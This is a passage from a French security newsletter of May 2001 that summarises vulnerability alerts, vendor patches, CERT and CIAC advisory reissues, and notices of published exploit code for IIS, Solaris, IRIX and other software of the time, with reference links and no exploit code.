traitement des fichiers '.ASX'. Critique 23/05 Microsoft Windows Media Player 6.4 et 7 Correctif existant 1 - Analyseur syntaxique '.ASX' 1 - Débordement de buffer MS01-029 2 - Raccourcis Internet 2 - Création non sécurisée des raccourcis http://www.microsoft.com/technet/security/bulletin/MS01-029.asp Multiples vulnérabilités dans le service d'indexation Deux vulnérabilités, exploitables à distance, liées au service d'indexation, autorisent l'une, l'exécution de commandes non sollicitées sur le serveur et l'autre, l'acquisition d'un quelconque fichier. Critique 10/05 NT 4.0 - Index Server 2.0 et W2K - Service d'indexation W2K 1- Débordement de buffer Correctif existant 1- Index Server 2.0 MS01-025 2- Index Server 2.0 et W2K 2- Fonction WebHits (Hit-Highlighting) http://www.microsoft.com/technet/security/bulletin/MS01-025.asp. Déni de service dans IIS 5.0 via une requête 'WebDav' L'extension 'WebDav' fournit certaines commandes dont une peut mener un utilisateur distant à provoquer un déni de service sur IIS 5.0. Forte 17/05 Microsoft Internet Information Server 5.0 ('httpext.dll' versions inférieures à 0.9.3940.21) Mauvaise gestion des requêtes 'WebDav' Correctif existant Méthode 'LOCK' http://www.securityfocus.com/archive/1/185074 [def-2001-26] Déni de service sur les contrôleurs de domaine W2K Une erreur de codage dans le service de gestion des domaines peut être mise à profit pour rendre indisponible les contrôleurs de domaines Windows 2000 Forte 08/05 Windows 2000 Server, Advanced Server et DataCenter Server Libération de la mémoire Correctif existant Gestion des domaines http://www.microsoft.com/technet/security/bulletin/MS01-024.asp MS01-024 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 28/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 NETSCAPE Débordement de buffer dans 'Netscape Enterprise' Un débordement de buffer affecte à distance la fonctionnalité 'Web Publisher' de Netscape Enterprise 4.1. Critique 15/05 Netscape Enterprise 4.1 et versions inférieures Débordement de buffer Correctif existant Fonction 'Web Publisher' () http://www.eeye.com/html/Research/Advisories/AD20010515.html AD20010515 Déni de service dans 'Netscape Enterprise Server' Il est possible de provoquer à distance un déni de service sur 'Netscape Enterprise Server' en soumettant une méthode ou requête invalide via le protocole HTTP. Moyenne 19/05 Netscape Enterprise Server 4 (SP3, SP7) sur Windows NT/2000 Mauvaise gestion des méthodes invalides Correctif existant Méthode ou requête HTTP http://www.securityfocus.com/archive/1/185550 Bugtraq NIPC Recrudescence d'attaques envers les serveurs Américains Le NIPC publie, sous la référence 01-009, un avis d'alerte au sujet d'une possible recrudescence d'attaques envers les sites web et serveurs de mails Américains par la Chine. Critique 26/04 Toute plate-forme Linux utilisant une version BIND 8.2,8.2-P1, 8.2.1, 8.2.2-Px, toutes les version 8.2.3 beta. Forte activité et propagation du virus Correctif existant Attaques par le ver 'lion' http://www.nipc.gov/warnings/advisories/2001/01-009.htm NIPC 01-009 Tentatives de déni de service via le port 80 (HTTP) Le NIPC informe qu'un grand nombre de site a été victime d'un déni de service distribué (DDos) contre l'accès web. Moyenne 05/05 Système utilisant le port 80 (HTTP) Redirection datagrammes UDP Surcharge du port 80 (HTTP) Aucun correctif http://www.nipc.gov/warnings/advisories/2001/01-012.htm NIPC 01-012 ORACLE Vulnérabilité dans la suite 'Oracle E-Business' La présence d'un fichier (bibliothèque 'DLL') utilisée à des fins de déboguage permet à un utilisateur de lire le mot de passe utilisé dans la suite 'Oracle E-Business'. Forte 22/05 Oracle E-Business Suite version 11i ADI (ApplicationsDesktop Integrator) Bibliothèque utilisée à des fins de déboguage Correctif existant Fichier 'FNDPUB11I.DLL' http://metalink.oracle.com/ BugTraq ROBTEX Vulnérabilité '..' dans le serveur WEB Viking Une erreur dans le traitement des URL autorise la visualisation de l'arborescence en dehors de la racine logique du serveur. Forte 25/04 Viking versions antérieures à 1.7-381 Gestion des URL relatives Correctif existant Serveur HTTP http://emc2k.com/dhcorp/homebrew/viking.zip DHC via Bugtraq SGI Débordement de buffer dans le service 'rpc.espd' Un débordement de buffer présent dans le service 'rpc.espd' peut être exploité à distance pour acquérir les privilèges de 'root' Critique 09/05 IRIX 6.5.5 à 6.5.8 (les systèmes 6.5.7 et 6.5.8 dotés du correctif 4123 ne sont pas vulnérables). Débordement de buffer Correctif existant Service 'rpc.espd' http://www.sgi.com/support/security/advisories.html SGI http://xforce.iss.net/alerts/advise76.php X-Force SUN Débordement de buffer dans 'yppasswd' Un débordement de buffer dans le service 'yppasswd' permet à un utilisateur distant d'obtenir un accès 'root' via le port TCP 77. Critique 10/05 Sun Solaris 6 et 7 (architecture SPARC) Service 'yppasswd' Débordement de buffer Palliatif proposé http://www.incidents.org/news/yppassword.php SANS Incidents Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 29/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Vulnérabilité dans les appels 'syscall' sur Intel Une vulnérabilité, ne touchant que les architectures Intel, affecte les appels 'syscall' et autorisent un utilisateur à accéder à certaines zones mémoire du noyau. Forte 16/05 Solaris 8, 7 et 2.6 (SunOS 5.8_x86, 5.7_x86, and 5.6_x86), Trusted Solaris 8 et 7 sur archirecture Intel Accès à des privilèges plus élevés Correctif existant Arguments des appels 'syscall' http://sunsolve.sun.com/pub-cgi/secBulletin.pl Sun #00202 SYMANTEC Accès distant à la base de configuration 'NetProwler' La base MySQL locale contenant la configuration et diverses informations sensibles est accessible depuis le réseau local Forte 08/05 NetProwler 3.5.x en environnement NT Accès réseau TCP/IP et SMB activés Correctif existant MySQL 3.22.24 http://www2.axent.com/swat/index.cfm?Doc=2001_05_08 Symantec eEYE Multiples vulnérabilités dans 'SecureIIS' De multiples vulnérabilités affectent le produit 'SecureIIS' de eEye. Elles sont majoritairement dues à l'utilisation de caractères d'échappement dans les requêtes HTTP. Forte 18/05 SecureIIS versions 1.0.2 et inférieures Contournement des règles de filtrage Correctif existant Caractères d'échappement http://www.securityfocus.com/archive/1/185379 ASLabs-2001-01 ALERTES NON CONFIRMEES Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces alertes nécessitent la mise en place d’un processus de suivi et d’observation. 3COM Vulnérabilité dans les routeurs 'OfficeConnect DSL' Une vulnérabilité dans les routeurs 'OfficeConnect DSL' permet à un utilisateur distance de provoquer un déni de service via une simple requête HTTP. Forte 15/05 Routeur 3COM OfficeConnect 812 Requête HTTP Mauvais traitement des requêtes malformées Aucun correctif http://www.securityfocus.com/archive/1/184665 Bugtraq ALADDIN Contournement des mécanismes de filtrage dans 'eSafe' Les mécanismes de filtrage de 'eSafe Gateway' sont contournables, laissant la possibilité, à un utilisateur distant, d'exécuter du code sur la machine vulnérable. Forte 20/05 eSafe Gateway 3.0 Filtrage de scripts Contournement des mécanismes de filtrage Aucun correctif http://www.securityfocus.com/archive/1/185578 Bugtraq CISCO Déni de service via le protocole 'HSRP' Il est possible de provoquer un déni de service sur le segment de réseau sur lequel transite le protocole 'HSRP'. Critique 04/05 Systèmes utilisant le protocole 'HSRP' Protocole 'HSRP' Création insécurisée de paquets 'HSRP' Palliatif proposé http://www.securityfocus.com/archive/1/182008 Bugtraq CMAIL Déni de service dans 'CMAIL' Il est possible de provoquer un déni de service dans 'CMAIL', à distance, par débordement de buffer dans la commande 'HELO'. Forte 18/05 CMail version 2.4.9 Commande 'HELO' Débordement de buffer Aucun correctif http://www.securiteam.com/windowsntfocus/5UP0B204AY.html Securiteam Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 30/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 MCAFEE Déni de service dans l'agent 'Remote Desktop' Un port positionné en émission de données permet à un utilisateur distant de provoquer un déni de service dans l'agent 'Remote Desktop'. Moyenne 16/05 McAfee Remote Desktop 3.0 et inférieurs Agent 'Remote Desktop' Envoi de données vers le port utilisé en émission Aucun correctif http://www.securityfocus.com/archive/1/184952 Bugtraq MICROSOFT Scripting XML dans IE et Outlook Express Un code Active Scripting peut être exécuté indépendamment des options d'autorisation positionnées dans les zones de sécurité. Critique 20/04 Internet Explorer 5.xOutlook Express WHS - Windows Host Scripting Court-circuit de l'option 'Active Scripting' Aucun correctif http://www.guninski.com/iexslt.html Guninski #43 Déni de service sur 'IIS 5.0' via 'PROPFIND' Il est possible de provoquer à distance un déni de service sur 'IIS 5.0' lorsque les extensions WEBDAV sont activées. Moyenne 06/05 Microsoft Internet Information Services 5.0 Requête PROPFIND Débordement de buffer Aucun correctif http://www.guninski.com/iispropover2.html Guninski #44 Déni de service d'accès web anonyme sur 'IIS' Il est possible de bloquer à distance le compte utilisateur utilisé par le serveur IIS afin d'empêcher l'accès aux pages web. Moyenne 23/04 IIS 4.0 sous Windows NT 4.0IIS 5.0 sous Windows 2000 Règles de blocages de compte Blocage du compte utilisateur IUSR_ XXXXX Aucun correctif http://www.securiteam.com/windowsntfocus/IIS_DoS_attack__Anonymous_lockout_.html Securiteam NOVELL Débordement de buffer dans le serveur mail MERCURY Un débordement de buffer présent dans le service 'APOP' du serveur de messagerie 'MERCURY for NETWARE' peut être exploité pour provoquer un déni de service Forte 23/04 Mercury for Netware versions antérieures à 1.48 Débordement de buffer Correctif existant Service APOP http://www.securiteam.com/securitynews/Mercury_for_NetWare_POP3_Server_Vulnerable_to_a_Remote_Bu Securiteam ffer_Overflow__APOP_.html Déni de Service sur BorderWare VPN Un déni de service exploitable à distance permet d'arrêter le service BorderWare VPN. Forte 20/04 BorderWare VPN 3.5 (confirmé) et BorderWare VPN 3.0-3.6 (probable) Service VPN Attaque de type SYN Flood Aucun correctif http://www.securityfocus.com/vdb/bottom.html?vid=2623 Bugtraq VMWare Vulnérabilité dans l'utilitaire 'vmware-mount' L'utilitaire 'vmware-mount' peut être utilisé, dans certaines conditions, pour écraser un quelconque fichier du système et provoquer un déni de service Moyenne 25/04 Version non documentée, a priori, VMWare V 2.0.3 Script 'vmware-mount.pl' Gestion des fichiers temporaires Aucun correctif http://www.securiteam.com/unixfocus/VMware_Symlink_Problems__DoS__Exploit_.html Securiteam AUTRES INFORMATIONS REPRISES D'AVIS ET CORRECTIFS Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont données lieu à la fourniture d'un correctif: ALLAIRE Reprise de l'avis Microsoft MS01-004 Allaire a repris, sous la référence CSB01-02, le bulletin Microsoft MS01-004 portant sur l'accès en lecture à certains fichiers via l'utilisation de l'extension '.htr' http://www.allaire.com/handlers/index.cfm?ID=21042&Method=Full Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 31/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Reprise de l'avis Microsoft MS01-014 Allaire a repris, sous la référence CSB01-03, le bulletin Microsoft MS01-014 concernant un déni de service pouvant être provoqué à distance contre IIS 5.0 et Exchange 2000 . http://www.allaire.com/handlers/index.cfm?ID=21044&Method=Full Reprise de l'avis Microsoft MS01-023 Allaire a repris, sous la référence CSB01-05, le bulletin Microsoft MS01-023 portant sur le débordement de buffer exploitable à distance présent dans le filtre '.printer' de l'extension ISAPI . http://www.allaire.com/handlers/index.cfm?ID=21045&Method=Full Reprise de l'avis @Stake portant sur IPlanet Web 4.x Allaire a repris, sous la référence CSB01-04, l'avis émis par @Stake portant sur l'accès distant à des informations sensibles gérées par un serveur IPlanet WEB 4.x . http://www.allaire.com/handlers/index.cfm?ID=21046&Method=Full Informations sur le bulletin Microsoft MS01-026 Allaire publie, sous la référence CSB01-07, un bulletin traitant de l'avis Microsoft MS01-026 au sujet d'une vulnérabilité dans le décodage des requêtes HTTP et affectant les serveurs IIS 4.0 et 5.0. Allaire signale aux utilisateurs que ces vulnérabilités risquent potentiellement d'affecter 'ColdFusion' et 'JRun', pouvant entraîner l'exécution de code à distance. http://www.allaire.com/handlers/index.cfm?ID=21205&Method=Full Informations sur les vulnérabilités affectant 'iPlanet' Allaire publie, sous la référence CSB01-06, une note information au sujet de deux failles découvertes sur les serveurs web iPlanet 4.1. Les fonctionnalités 'Web Publisher' sur 'Netscape Enterprise' sont à l'origine d'une des vulnérabilités. http://www.allaire.com/handlers/index.cfm?ID=21204&Method=Full AUSCERT Reprise de l'avis Microsoft MS01-023 L'AusCERT a repris, sous la référence AL-2001.07, le bulletin Microsoft MS01-023 au sujet d'un débordement de buffer exploitable à distance et affectant le filtre '.printer' de l'extension ISAPI . ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.07 CERT Complément d'informations au sujet du bulletin MS01-026 Le CERT publie, sous la référence CA-2001-12, un bulletin d'alerte au sujet de la vulnérabilité présente dans l'encodage des requêtes HTTP, discutée dans le bulletin Microsoft MS01-026. Un double encodage des caractères spéciaux (RFC 2396) permet en effet de contourner le mécanisme de vérification des requêtes. Celui-ci devenant inopérant, il est possible de spécifier un chemin en dehors de la racine web afin d'accéder à des fichiers ou commandes normalement interdits. Voir aussi le bulletin émis par ISS (X-Force). http://www.cert.org/advisories/CA-2001-12.html http://www2.fedcirc.gov/advisories/FA-2001-12.html http://xforce.iss.net/alerts/advise77.php Alerte relative au bulletin Microsoft MS01-023 Le CERT et le FedCIRC publient, sous les références CA-2001-10 et FA-2001-10, un bulletin d'alerte relatif à l'avis Microsoft MS01-023 traitant du débordement de buffer affectant l'extension ISAPI d'IIS 5.0. Un utilisateur peut exploiter cette vulnérabilité afin d'exécuter du code distant sur la machine cible. Le NIPC publie aussi un bulletin sous la référence 01-011. http://www.cert.org/advisories/CA-2001-10.html http://www2.fedcirc.gov/advisories/FA-2001-10.html http://www.nipc.gov/warnings/advisories/2001/01-011.htm CIAC Reprise de l'avis Microsoft MS01-022 Le CIAC a repris, sous la référence L-074, l'avis Microsoft MS01-022 'WebDAV Service Provider Can Allow Scripts to Levy Requests as User'. Il est possible de provoquer l'exécution de scripts à destination du composant 'WebDAV Service Provider' afin d'accéder aux ressources 'WebDAV'. http://ciac.llnl.gov/ciac/bulletins/l-074.shtml Reprise de l'avis Cisco CSCdt79947 Le CIAC a repris, sous la référence L-082, l'avis Cisco CSCdt79947 traitant d'une vulnérabilité dans la gestion de l'un des attributs NLRI (Network Layer Reachability Information) qui induit un dysfonctionnement aléatoire de l'équipement voire un déni de service. http://ciac.llnl.gov/ciac/bulletins/l-082.shtml Reprise de l'avis FreeBSD-SA-01:32 Le CIAC a repris, sous la référence L-075, l'avis FreeBSD SA-01:32 (Révisé) 'IPFilter may incorrectly pass packets'. Il est possible de passer un fragment IP, sous certaines conditions, en contournant les règles de filtrage mises en place. http://ciac.llnl.gov/ciac/bulletins/l-075.shtml Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 32/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Reprise de l'avis Red Hat RHSA-2001:047-03 Le CIAC a repris, sous la référence L-076, l'avis RedHat RHSA-2001:047-03 'Linux kernel 2.2.19 now available'. Cette nouvelle version du noyau corrige de nombreux problèmes de sécurité et intègre NFS V3. http://ciac.llnl.gov/ciac/bulletins/l-076.shtml Reprise de l'avis Microsoft MS01-026 Le CIAC a repris, sous la référence L-083, l'avis Microsoft MS01-026 traitant de plusieurs vulnérabilités dans IIS 4.0 et 5.0. Un encodage superflu des requêtes HTTP permet de contourner le processus de filtrage, autorisant un utilisateur distant à sortir de la racine web et d'exécuter du code sous les droits de 'IUSR_'. http://ciac.llnl.gov/ciac/bulletins/l-083.shtml Reprise de l'avis Red Hat RHSA-2001:044-08 Le CIAC a repris, sous la référence L-084, l'avis Red Hat RHSA-2001:044-08 traitant d'une vulnérabilité autorisant un utilisateur local à créer un lien symbolique dans le répertoire '/tmp' afin de corrompre certains fichiers suite à une requête d'impression. http://ciac.llnl.gov/ciac/bulletins/l-084.shtml Reprise de l'avis Cisco CSCdt64682 Le CIAC a repris, sous la référence L-085, l'avis Cisco CSCdt64682 traitant d'un défaut de permissions sur les commutateurs CSS 11000 autorisant un utilisateur distant, pouvant établir une connexion FTP valide, à accéder à la totalité des fichiers présents sur le système. http://ciac.llnl.gov/ciac/bulletins/l-085.shtml Reprise de l'avis Cisco 'CBOS-multiple2-pub' Le CIAC a repris, sous la référence L-086, les avis Cisco CSCds16078, CSCds30150, CSCdt04882 et CSCds74567, regroupés dans un même bulletin CBOS-multiple2-pub. Plusieurs vulnérabilités affectent CBOS sur la famille des routeurs Cisco 600 et peuvent mener un utilisateur à provoquer un déni de service, acquérir des informations sensibles ou compromettre les connexions TCP. http://ciac.llnl.gov/ciac/bulletins/l-086.shtml Reprise de l'avis Microsoft MS01-023 Le CIAC a repris, sous la référence L-078, l'avis Microsoft MS01-023 au sujet d'un débordement de buffer affectant l'extension ISAPI sous IIS 5.0. Un utilisateur peut exploiter cette vulnérabilité afin d'exécuter du code distant sur la machine cible. http://ciac.llnl.gov/ciac/bulletins/l-078.shtml Reprise de l'avis Microsoft MS01-021 Le CIAC a repris, sous la référence L-073, l'avis Microsoft MS01-021 'Invalid Web Request Can Cause Access Violation in ISA Server Web Proxy Service'. Le service 'Web Proxy' d'un serveur ISA (Internet Security and Acceleration) est vulnérable à distance à une attaque de type déni de service. http://ciac.llnl.gov/ciac/bulletins/l-073.shtml Reprise de l'avis Microsoft MS01-024 Le CIAC a repris, sous la référence L-079, le bulletin Microsoft MS01-024 traitant d'un déni de service sur les contrôleurs de domaine Windows 2000. Il est possible de saturer la mémoire du système en soumettant une multitude de requêtes mal formatées. http://ciac.llnl.gov/ciac/bulletins/l-079.shtml Reprise de l'avis SGI 20010501-01-P Le CIAC a repris, sous la référence L-080, l'avis SGI 20010501-01-P au sujet d'un débordement de buffer dans le service 'rpc.espd'. Il est possible d'exploiter la vulnérabilité à distance afin d'exécuter une commande quelconque et acquérir ainsi les privilèges de 'root'. http://ciac.llnl.gov/ciac/bulletins/l-080.shtml Reprise de l'avis Microsoft MS01-025 Le CIAC a repris, sous la référence L-081, le bulletin Microsoft MS01-025 au sujet de deux vulnérabilités, exploitables à distance, liées au service d'indexation de Windows 2000, Index Server 2.0. Il est possible d'exécuter des commandes non sollicitées sur le serveur et d'acquérir un fichier quelconque. http://ciac.llnl.gov/ciac/bulletins/l-081.shtml Révision de l'avis L-70 portant sur 'ftp' Une référence à l'avis FreeBSD FreeBSD-SA-01:33 a été rajoutée à l'avis CIAC L-70 portant sur le service 'ftp'. Une vulnérabilité de type débordement de buffer peut être activée lors de l'expansion des noms de fichiers. http://ciac.llnl.gov/ciac/bulletins/l-070.shtml Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 33/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 COMPAQ Disponibilité des correctifs pour 'xntp' Compaq annonce la disponibilité des correctifs pour 'xntp' pour les systèmes Tru64 UNIX versions 4.0d, 4.0f, 4.0g, 5.0, 5.0a et 5.1. Une vulnérabilité dans le démon permet à un utilisateur distant de provoquer un déni de service, voire à obtenir un interpréteur de commande 'root' distant grâce à un débordement de buffer. http://ftp.support.compaq.com/patches/public/Readmes/unix/duv40d16-c0058302-10580-20010430.README http://ftp.support.compaq.com/patches/public/Readmes/unix/duv40f16-c0042002-10579-20010430.README http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v40g16-c0003502-10577-20010430.README http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v5016-c0006102-10575-20010430.README http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v50a16-c0010402-10574-20010430.README http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v513-c0027202-10573-20010430.README FREEBSD Disponibilité de plusieurs correctifs FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: hylafax FreeBSD-SA-01:34 licq FreeBSD-SA-01:35 samba FreeBSD-SA-01:36 slrn FreeBSD-SA-01:37 sudo FreeBSD-SA-01:38 TCP Kernel FreeBSD-SA-01:39 http://www.linuxsecurity.com/advisories/ LINUX DEBIAN Disponibilité de nombreux correctifs Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: zope DSA-043-2 samba DSA-048-3 netscape DSA-051-1 sendfile DSA-052-1 nedit DSA-053-1 cron DSA-054-1 zope DSA-055-1 mandb DSA-056-1 gftp DSA-057-1 http://lists.debian.org/debian-security-announce-01 LINUX MANDRAKE Disponibilité de nombreux correctifs Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: openssh MDKSA-2001:033-2 7.1 / 7.2 / CS1.0.1 / 8.0 samba MDKSA-2001:040-1 7.1 / 7.2 / CS1.0.1 / 8.0 hylafax MDKSA-2001:041 7.1 / 7.2 / CS1.0.1 nedit MDKSA-2001:042 7.1 / 7.2 / CS1.0.1 / 8.0 rpmdrake MDKSA-2001:043 8.0 gftp MDKSA-2001:044 7.1 / 7.2 / CS1.0.1 / 8.0 gnupg MDKSA-2001:045 8.0 kdelibs MDKSA-2001:046 7.1 / 7.2 / CS1.0.1 / 8.0 pine MDKSA-2001:047-1 7.1 / 7.2 / CS1.0.1 / 8.0 cups MDKSA-2001:048 7.2 / 8.0 zope MDKSA-2001:049 7.1 / 7.2 / CS1.0.1 vixie-cron MDKSA-2001:050 7.1 / 7.2 / CS1.0.1 / 8.0 http://www.linux-mandrake.com/en/security/2001 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 34/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 LINUX REDHAT Disponibilité de nombreux correctifs RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: samba RHSA-2001:044-08 6.2 / 7.1 mgetty RHSA-2001:050-04 6.2 / 7.x iptables RHSA-2001:052-02 7.1 gftp RHSA-2001:053-06 6.2 / 7.1 mounts RHSA-2001:058-04 7.1 kdelibs RHSA-2001:059-03 7.1 kerberos RHSA-2001:060-04 6.2 / 7.x nedit RHSA-2001:061-02 5.2 / 6.2 / 7.x gnupg RHSA-2001:063-02 6.2 / 7.x zope RHSA-2001:065-05 6.2 / 7.x minicom RHSA-2001:067-03 5.2 / 6.2 / 7.x man RHSA-2001:069-02 6.2 / 7.0 mktmp RHSA-2001:070-02 5.2 / 6.2 http://www.linuxsecurity.com/advisories/ MICROSOFT Disponibilité du Service Pack 2 (SP2) pour Windows 2000 Microsoft annonce la disponibilité du Service Pack 2 (SP2) pour le système d'exploitation Windows 2000. Les 46 correctifs qui le constituent permettent de fiabiliser le système, d'assurer la compatibilité entre applications ainsi que de résoudre les problèmes de sécurité et de configuration. http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/default.asp http://www.microsoft.com/technet/security/w2ksp2.asp http://www.microsoft.com/Windows2000/server/evaluation/news/bulletins/128bit.asp Microsoft infecte ses clients du virus 'Fun_Love' Microsoft a reconnu que 26 sociétés, abonnées au support Gold et Premier, ont été infectées par le virus 'Fun_Love'. Ce dernier est particulièrement difficile à éradiquer car il se propage sur les disques partagés via le réseau Microsoft. Windows NT ainsi que Windows 95, 98 et Me seraient les cibles potentielles du virus. Cependant, Microsoft affirme que seuls 170 fichiers infectés auraient été téléchargés par les clients. http://www.zdnet.co.uk/news/2001/16/ns-22474.html http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_FUNLOVE.4099 Mise à jour de l'avis MS01-015 portant sur IE 5.x Microsoft publie une mise à jour de son avis MS01-015 'IE can Divulge Location of Cached Content' . Une régression a été découverte dans le correctif 'Windows Script Host' référencé dans la version originale de l'avis. Il est en conséquence conseillé d'appliquer immédiatement la nouvelle version disponible sur le site Microsoft. Windows Host Scripting 5.1: http://www.microsoft.com/msdownload/vbscript/scripting51.asp Windows Host Scripting 5.5: http://www.microsoft.com/msdownload/vbscript/scripting.asp http://www.microsoft.com/technet/security/bulletin/ms01-015.asp Mise à jour de l'avis MS00-035 'SQL 7.0 Password' Microsoft publie une mise à jour de l'avis MS00-035 'SQL Server 7.0 Service Pack Password Vulnerability' pour annoncer la disponibilité d'un correctif applicable au Service Pack 3 de SQL 7.0. Les versions antérieures de l'avis portaient sur le correctif lié aux Services Packs 1 et 2 de SQL http://www.microsoft.com/technet/security/bulletin/MS00-035.asp. OpenBSD Disponibilité des correctifs pour 'ftpd' OpenBSD annonce la disponibilité des correctifs contre la vulnérabilité affectant le démon ftp 'ftpd' permettant de provoquer à distance un débordement de buffer au travers de la fonction 'glob()'. http://www.openbsd.org/errata28.html#glob_limit Disponibilité des correctifs pour 'ipf' OpenBSD annonce la disponibilité des correctifs pour 'ipf'. Un utilisateur distant peut être autorisé à passer un paquet au travers des filtres. http://www.openbsd.org/errata28.html#ipf_frag OpenSSL Nouvelle version 'OpenSSL 0.9.6a' OpenSSL.org annonce la version 0.9.6a d'OpenSSL. Les changements les plus importants résident dans la correction de failles potentielles, comme l'utilisation sécurisée des variables d'environnement lorsque OpenSSL fonctionne sous l'autorité de 'root', la vérification du résultat RSA-CRT ou encore la prévention d'attaques. http://www.openssl.org/news/announce.htmlhttp://www.openssl.org/source/ Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 35/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 SAMBA Disponibilité d'une révision 2.0.9 stable et finale La révision 2.0.8 de 'samba' ne corrige pas le problème de lien symbolique apparu dans la révision 2.0.7 comme annoncé par l'équipe de développement. Celle-ci a donc diffusé la révision 2.0.9 en annonçant qu'il s'agissait de la dernière mise à jour de samba version 2.0. Le passage à la version 2.2, immune et maintenue, est fortement recommandé. Les éditeurs LINUX vont, a l'instar de DEBIAN, annoncer la disponibilité d'un correctif 2.0.9. http://fr.samba.org/samba/samba.html CODES D'EXPLOITATION Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion: ALCATEL Technique d'attaque exploitant l'accès 'EXPERT' Une technique d'attaque exploitant l'accès 'EXPERT' des modems ADSL ALCATEL est détaillée dans la liste bugtraq. En pratique, cette technique tire parti des fonctionnalités de translation d'adresses (NAT) et de ports (PAT) offertes par le routeur intégré au modem. La mise en pratique suppose cependant que l'interface IP du routeur puisse être atteinte depuis Internet pour en prendre le contrôle. L'attaquant peut alors reconfigurer le routeur pour assurer la translation des requêtes externes dans le plan d'adressage privé se faisant ainsi passer pour un système interne. http://www.securityfocus.com/archive/1/179205 HYLAFAX Code d'exploitation de la vulnérabilité 'syslog' Un code exploitant la vulnérabilité liée à l'option '-q' (activation de la fonction 'syslog') du service 'hfaxd' a été diffusé sur le site 'digit-labs'. Il est en conséquence fortement recommandé d'assurer la mise à jour de ce service. http://www.digit-labs.org/files/formatstrings/hfaxd-fs-exploit.pl.txt Microsoft Codes d'exploitation pour la vulnérabilité IIS Plusieurs codes d'exploitation (écrits en langage C et en Perl) concernant la récente vulnérabilité des serveurs IIS 4.0 et 5.0, ont été diffusés sur la liste Bugtraq. Il est impératif d'appliquer les correctifs fourni dans l'avis Microsoft MS01-026. http://www.securityfocus.com/archive/1/184795http://www.securityfocus.com/archive/1/184822 Code d'exploitation pour 'IIS 5.0' (IPP/ISAPI) Securiteam publie un code exploitant la vulnérabilité de type débordement de buffer sous Microsoft Windows 2000 et IIS 5.0. (filtre '.printer' de la bibliothèque ISAPI pour le protocole IPP). Il permet d'exécuter du code sur la machine distante. http://www.securiteam.com/exploits/IIS_5_0___printer__Exploit_Code_Released.html Nouveau code d'exploitation '.printer' sous IIS 5.0 Securiteam publie un nouveau code exploitant le débordement de buffer présent dans le filtre '.printer' de la bibliothèque ISAPI sous IIS 5.0 . Dénommé 'IISHACK2000', ce code automatise l'ouverture d'une session interactive sur la machine cible. En pratique, ce code résulte du simple portage du code écrit en 'C' et diffusé il y a quelques jours. http://www.securiteam.com/exploits/5TP0C004AS.html BULLETINS ET NOTES Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les éditeurs: ATTAQUES Recrudescence des attaques envers 'IIS' et 'sunrpc' L'AusCERT informe qu'un grand nombre d'attaques (probablement dues au nouveau ver 'sadmind/IIS') a été recensé contre Microsoft Internet Information Server (IIS) et les services Sun portmapper (sunrpc). Le bug 'unicode' serait exploité afin de compromettre les systèmes 'IIS' tandis que le port 111 le serait sous les systèmes Sun. Cette information est similaire à l'alerte CERT CA-2001-11 . ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.08 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 36/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 AusCERT Récapitulatif des bulletins Microsoft IIS 4.0 et 5.0 L'AusCERT publie, sous la référence AA-2001.02, un récapitulatif exhaustif et ordonné de tous les correctifs concernant Microsoft IIS. Construit sur quatre sections, il recense et résume en quelques lignes les bulletins suivants : 1. Correctifs pour IIS 4.0 sur Windows NT 4 SP6a MS98-004 - Unauthorized ODBC Data Access with RDS and IIS MS99-025 - Unauthorized Access to IIS Servers Through ODBC Data Access with RDS MS00-018 - Patch Available for "Chunked Encoding Post" Vulnerability MS00-063 - Patch Available for "Invalid URL" Vulnerability MS99-039 - Patch Available for "Domain Resolution" and "FTP Download" Vulnerabilities MS99-058 - Patch Available for "Virtual Directory Naming" Vulnerability MS00-006 - Patch Available for "Malformed Hit-Highlighting Argument" Vulnerability MS00-028 - Procedure Available to Eliminate "Server-Side Image Map Components" Vulnerability MS99-053 - Patch Available for Windows "Multithreaded SSL ISAPI Filter" Vulnerability MS99-061 - Patch Available for "Escape Character Parsing" Vulnerability MS00-025 - Procedure Available to Eliminate "Link View Server-Side Component" Vulnerability 2. Correctifs pour IIS 5.0 